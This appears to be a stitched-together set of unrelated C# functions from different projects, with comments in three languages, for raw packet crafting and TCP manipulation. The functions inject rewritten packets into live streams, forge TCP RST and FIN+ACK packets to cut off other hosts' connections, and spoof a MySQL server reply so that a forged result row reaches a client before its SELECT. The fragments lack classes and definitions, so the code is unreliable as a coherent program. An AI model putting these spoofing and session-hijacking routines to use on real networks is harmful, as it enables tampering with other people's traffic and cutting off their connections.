void Inject(NetworkSniffer sniffer, TcpStream stream, Packet[] packets)
{
WriteInfo("Injecting packets");
foreach (EthernetPacket p in packets)
{
// Override ethernet
p.DestinationHwAddress = stream.DestinationHwAddress;
p.SourceHwAddress = stream.SourceHwAddress;
p.UpdateCalculatedValues();
IpPacket ip = (IpPacket)p.PayloadPacket;
ip.SourceAddress = stream.Source.Address;
ip.DestinationAddress = stream.Destination.Address;
ip.UpdateCalculatedValues();
if (ip.Protocol != IPProtocolType.TCP)
{
continue;
}
TcpPacket tcp = (TcpPacket)ip.PayloadPacket;
tcp.SourcePort = (ushort)stream.Source.Port;
tcp.DestinationPort = (ushort)stream.Destination.Port;
tcp.UpdateCalculatedValues();
// Send
sniffer.Send(p);
}
}
private void SendRstPacket(EthernetPacket ethernetPacket, IPPacket ipPacket, TcpPacket tcpPacket)
{
var sourceHwAddress = PhysicalAddress.Parse(ethernetPacket.SourceHwAddress.ToString());
var sourceAddress = IPAddress.Parse(ipPacket.SourceAddress.ToString());
var acknowledgementNumber = tcpPacket.AcknowledgmentNumber;
var sourcePort = tcpPacket.SourcePort;
ethernetPacket.SourceHwAddress = ethernetPacket.DestinationHwAddress;
ethernetPacket.DestinationHwAddress = sourceHwAddress;
ipPacket.SourceAddress = ipPacket.DestinationAddress;
ipPacket.DestinationAddress = sourceAddress;
tcpPacket.Syn = false;
tcpPacket.Ack = false;
tcpPacket.Rst = true;
tcpPacket.AcknowledgmentNumber = tcpPacket.SequenceNumber;
tcpPacket.SequenceNumber = acknowledgementNumber;
tcpPacket.SourcePort = tcpPacket.DestinationPort;
tcpPacket.DestinationPort = sourcePort;
tcpPacket.Checksum = tcpPacket.CalculateTCPChecksum();
ethernetPacket.UpdateCalculatedValues();
ipPacket.UpdateCalculatedValues();
tcpPacket.UpdateCalculatedValues();
ipPacket.PayloadPacket = tcpPacket;
ethernetPacket.PayloadPacket = ipPacket;
this.captureDevice.SendPacket(ethernetPacket);
}
// IPv4 + TCP数据包封装函数
private EthernetPacket TcPonIPv4PacketMaker()
{
// Ether封包
var ether = new EthernetPacket(PhysicalAddress.Parse(MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text)),
PhysicalAddress.Parse(MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text)),
EthernetPacketType.IPv4);
// TCP封包
var tcp = new TcpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text))
{
Urg = TCPFlagsCheckedListBox.GetItemChecked(0),
Ack = TCPFlagsCheckedListBox.GetItemChecked(1),
Psh = TCPFlagsCheckedListBox.GetItemChecked(2),
Rst = TCPFlagsCheckedListBox.GetItemChecked(3),
Syn = TCPFlagsCheckedListBox.GetItemChecked(4),
Fin = TCPFlagsCheckedListBox.GetItemChecked(5),
SequenceNumber = Convert.ToUInt32(SequenceTextBox.Text),
AcknowledgmentNumber = Convert.ToUInt32(AcknowledgmentTextBox.Text),
WindowSize = Convert.ToUInt16(WindowSizeTextBox.Text),
UrgentPointer = Convert.ToInt32(UrgPointerTextBox.Text)
};
if (PayloadTextBox.Text.Length != 0)
{
tcp.PayloadData = Encoding.ASCII.GetBytes(PayloadTextBox.Text);
}
tcp.UpdateCalculatedValues();
// IPv4封包
var IPv4 = new IPv4Packet(IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text)),
IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text)))
{
TimeToLive = Convert.ToInt32(TTLTextBox.Text),
Protocol = IPProtocolType.TCP,
Version = IPVersion.IPv4,
FragmentFlags = Convert.ToInt16(FragmentFlagsTextBox.Text),
FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text),
TypeOfService = Convert.ToInt32(TOSTextBox.Text),
Id = Convert.ToUInt16(IdentifierTextbox.Text),
PayloadPacket = tcp
};
ether.PayloadPacket = IPv4;
IPv4.ParentPacket = ether;
IPv4.UpdateIPChecksum();
tcp.ParentPacket = IPv4;
tcp.UpdateTCPChecksum();
return(ether);
}
/// <summary>
/// 尝试发送FIN+ACK标志结束某一组互联网上的连接。
/// </summary>
/// <param name="srcAddress">连接的起点,应为小端地址。</param>
/// <param name="srcPort">连接起点的端口。</param>
/// <param name="dstAddress">连接的终点,应为大端地址。</param>
/// <param name="dstPort">连接终点的端口。</param>
/// <returns>成功发送包返回true,失败返回false。</returns>
public bool KillConnection(IPAddress srcAddress, ushort srcPort, IPAddress dstAddress, ushort dstPort)
{
EthernetPacket ether;
// 寻找指定目标
lock (_tcpLinks) {
if (_tcpLinks.All(item => !(item.SrcAddress.Equals(srcAddress) && item.SrcPort == srcPort) ||
!(item.DstAddress.Equals(dstAddress) && item.DstPort == dstPort)))
{
return(false);
}
ether = new EthernetPacket(_tcpLinks.Find(item => item.SrcAddress.Equals(srcAddress) && item.SrcPort == srcPort &&
item.DstAddress.Equals(dstAddress) && item.DstPort == dstPort)
.LastPacket.BytesHighPerformance);
}
// 解析包数据
var ipv4 = (IPv4Packet)ether.PayloadPacket;
var tcp = (TcpPacket)ipv4.PayloadPacket;
// 设置数据包内容
var payload = new TcpPacket(tcp.SourcePort, tcp.DestinationPort)
{
Fin = true,
Ack = true,
SequenceNumber = (uint)(tcp.SequenceNumber + (tcp.PayloadPacket?.TotalPacketLength ?? 0)),
AcknowledgmentNumber = tcp.AcknowledgmentNumber,
WindowSize = tcp.WindowSize
};
payload.UpdateCalculatedValues();
ipv4.PayloadPacket = payload;
payload.ParentPacket = ipv4;
payload.UpdateTCPChecksum();
_device.SendPacket(ether);
return(true);
}
static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet)
{
NetworkSniffer ns = (NetworkSniffer)sender;
IPv4Packet ip = (IPv4Packet)packet.PayloadPacket;
TcpPacket t = (TcpPacket)ip.PayloadPacket;
// Si el paquete recibido es el de respuesta OK del mysql
if (t.PayloadData.SequenceEqual(ResponseOk))
{
Parent = packet;
// Replicamos el paquete, enviando el payload de la fila, si, antes de recibir el SELECT
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
ip.Id++;
t.SequenceNumber = LastSequenceId;
t.OptionsCollection.Clear();
t.PayloadData = Payload;
t.Ack = true;
t.Psh = true;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
else
{
// Si el paquete contiene el valor SELECT
string ascii = Encoding.ASCII.GetString(t.PayloadData);
if (Parent != null && ascii.Contains("SELECT"))
{
// Ya no actuamos mas
ns.OnPacket -= Ns_OnPacket;
ip = (IPv4Packet)Parent.PayloadPacket;
t = (TcpPacket)ip.PayloadPacket;
// Enviamos un ACK del paquete recibido, para darle por bueno
t.SequenceNumber = LastSequenceId;
t.AcknowledgmentNumber = t.AcknowledgmentNumber;
t.PayloadData = new byte[] { };
ip.Id++;
t.Ack = true;
t.Psh = false;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
}
}
